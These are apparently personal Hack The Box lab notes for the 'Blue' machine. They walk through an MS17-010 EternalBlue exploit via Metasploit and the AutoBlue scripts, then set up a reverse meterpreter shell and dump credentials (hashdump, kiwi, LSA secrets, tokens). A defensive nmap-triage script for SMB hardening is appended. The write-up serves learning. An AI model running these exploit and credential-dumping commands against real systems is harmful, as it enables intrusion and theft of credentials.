Blue
HTB - 3. Blue (MS17.010)
- 1.
    nmap -T4 -p- -A 10.10.10.40
  Shows 139 & 445 (SMB) open, version Windows 7 Professional 7601 Service Pack 1, computer name is haris-PC, message signing enabled but not required.
- 2. Metasploit
  Test if vulnerable:
    sudo msfconsole
    search ms17-010
    use auxiliary/scanner/smb/smb_ms17_010
    options
    set rhosts 10.10.10.40
    run
  Result: Host is likely vulnerable
  Exploit:
    use exploit/windows/smb/ms17_010_eternalblue
    set rhosts 10.10.10.40
    show targets
    run
  Result: shell popped with nt authority\system
  Used an un-staged payload, so let's try staged and get a meterpreter:
    set payload windows/x64/meterpreter/reverse_tcp
    options
    run
    getuid
    sysinfo
    hashdump
    shell
    route print
    arp -a
    netstat -ano
    load kiwi
    help
    creds_all
    lsa_dump_sam
    lsa_dump_secrets
    load incognito
    list_tokens -u
- 3. Autoblue: https://github.com/3ndG4me/AutoBlue-MS17-010
    git clone https://github.com/3ndG4me/AutoBlue-MS17-010
    cd AutoBlue-MS17-010
    ls
    python eternalblue_checker.py 10.10.10.40
  Result: Target not patched
  Exploit:
    cd shellcode
    sudo ./shell_prep.sh
    y
    10.10.14.24
    4445
    4446
    0 <-- Meterpreter instead of shell
    0 <-- Staged instead of un-staged
    cd ..
    ls
    sudo ./listener_prep.sh
    10.10.14.24
    4445
    4446
    0
    0
    python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
    sessions
    sessions 1
    getuid
    whoami
    sysinfo
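The findings from step 1 (445 open, Windows 7 SP1, signing enabled but not required) are what a defender would want flagged across a whole scan. The following is an added example, not part of the original notes: it triages nmap normal-format output for those conditions. The sample output, the second host (10.10.10.41), the legacy OS list and the `triage` function are assumptions constructed for illustration.

```python
import re

# Constructed sample of nmap output; host 1 uses the values noted in step 1.
SAMPLE = """\
Nmap scan report for 10.10.10.40
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|_  Computer name: haris-PC
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.41
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)
# End-of-support Windows releases (list chosen for this example).
LEGACY_OS = re.compile(r"Windows (XP|Vista|7|Server 2003|Server 2008)\b", re.I)

def triage(nmap_text):
    """Return {host: [findings]} for SMB hardening follow-up."""
    report = {}
    parts = HOST_RE.split(nmap_text)[1:]  # [host1, body1, host2, body2, ...]
    for host, body in zip(parts[0::2], parts[1::2]):
        findings = []
        if re.search(r"^445/tcp\s+open", body, re.M):
            findings.append("445/tcp reachable: restrict SMB to hosts that need it")
        if re.search(r"signing enabled but not required|message_signing: disabled", body, re.I):
            findings.append("SMB signing not enforced: require signing via policy")
        m = re.search(r"^\|\s+OS: (.+?)(?: \(|$)", body, re.M)
        if m and LEGACY_OS.search(m.group(1)):
            findings.append(f"end-of-support OS ({m.group(1)}): confirm MS17-010 patch, disable SMBv1")
        report[host] = findings
    return report

if __name__ == "__main__":
    for host, findings in triage(SAMPLE).items():
        print(host, findings)
```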